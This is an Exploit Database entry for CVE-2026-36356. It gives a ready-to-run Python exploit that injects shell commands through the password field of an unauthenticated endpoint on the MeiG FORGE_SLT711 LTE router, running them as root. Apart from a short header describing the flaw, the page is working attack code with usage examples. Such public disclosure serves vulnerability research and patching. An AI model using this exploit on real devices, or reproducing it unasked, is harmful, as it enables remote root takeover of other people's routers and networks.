This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING MeiG Smart FORGE_SLT711 - OS Command Injection EDB-ID: 52581 CVE: 2026-36356 EDB Verified: Author: DANIIL GORDEEV Type: HARDWARE Exploit: / Platform: LINUX Date: 2026-05-27 Vulnerable App: # Exploit Title: MeiG Smart FORGE_SLT711 - OS Command Injection # Date: 2026-05-03 # Exploit Author: Daniil Gordeev # Vendor Homepage: http://www.meigsmart.com # Software Link: N/A (firmware distributed via carrier channels) # Version: Firmware MDM9607.LE.1.0-00110-STD.PROD-1 (likely all firmware versions of this product line) # Tested on: MeiG FORGE_SLT711 (Ortel 4G LTE CPE), Qualcomm MDM9607, Linux 3.18.48 # CVE: CVE-2026-36356 """ Unauthenticated RCE — MeiG FORGE_SLT711 (Ortel 4G LTE CPE) GoAhead /action/SetRemoteAccessCfg OS command injection Vuln: JSON "password" field → sprintf("echo root:\"%s\"|chpasswd") → system() Auth: None (endpoint missing from route.txt auth list) Root: Commands execute as uid=0(root) Type: Blind — output not in HTTP response, use --cmd "cmd > /tmp/out" to exfil Discovered: 2026-02-21 Tested on: FW MDM9607.LE.1.0-00110-STD.PROD-1 """ import argparse import json import sys import urllib.request import urllib.error def exploit(ip: str, cmd: str, port: int = 80, timeout: int = 10) -> bool: url = f"http://{ip}:{port}/action/SetRemoteAccessCfg" payload = json.dumps({"password": f"$({cmd})"}) req = urllib.request.Request( url, data=payload.encode(), headers={"Content-Type": "application/json"}, method="POST", ) try: with urllib.request.urlopen(req, timeout=timeout) as resp: body = resp.read().decode() data = json.loads(body) if data.get("retcode") == 0: print(f"[+] retcode:0 — command executed as root") return True else: print(f"[-] Unexpected response: {body}") return False except urllib.error.URLError as e: print(f"[-] Connection failed: {e}") return False except Exception as e: print(f"[-] Error: {e}") return False def main(): p = argparse.ArgumentParser( description="MeiG SLT711 GoAhead unauthenticated RCE (blind)", epilog="Example: %(prog)s --ip 192.168.1.1 --cmd 'id > /tmp/out'", ) p.add_argument("--ip", default="192.168.1.1", help="Target IP (default: 192.168.1.1)") p.add_argument("--port", type=int, default=80, help="Target port (default: 80)") p.add_argument("--cmd", required=True, help="Command to execute as root (blind, no output returned)") p.add_argument("--timeout", type=int, default=10, help="HTTP timeout in seconds (default: 10)") args = p.parse_args() print(f"[*] Target: {args.ip}:{args.port}") print(f"[*] Command: {args.cmd}") print(f"[*] Payload: $({{cmd}}) inside password field") ok = exploit(args.ip, args.cmd, args.port, args.timeout) sys.exit(0 if ok else 1) if __name__ == "__main__": main() Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.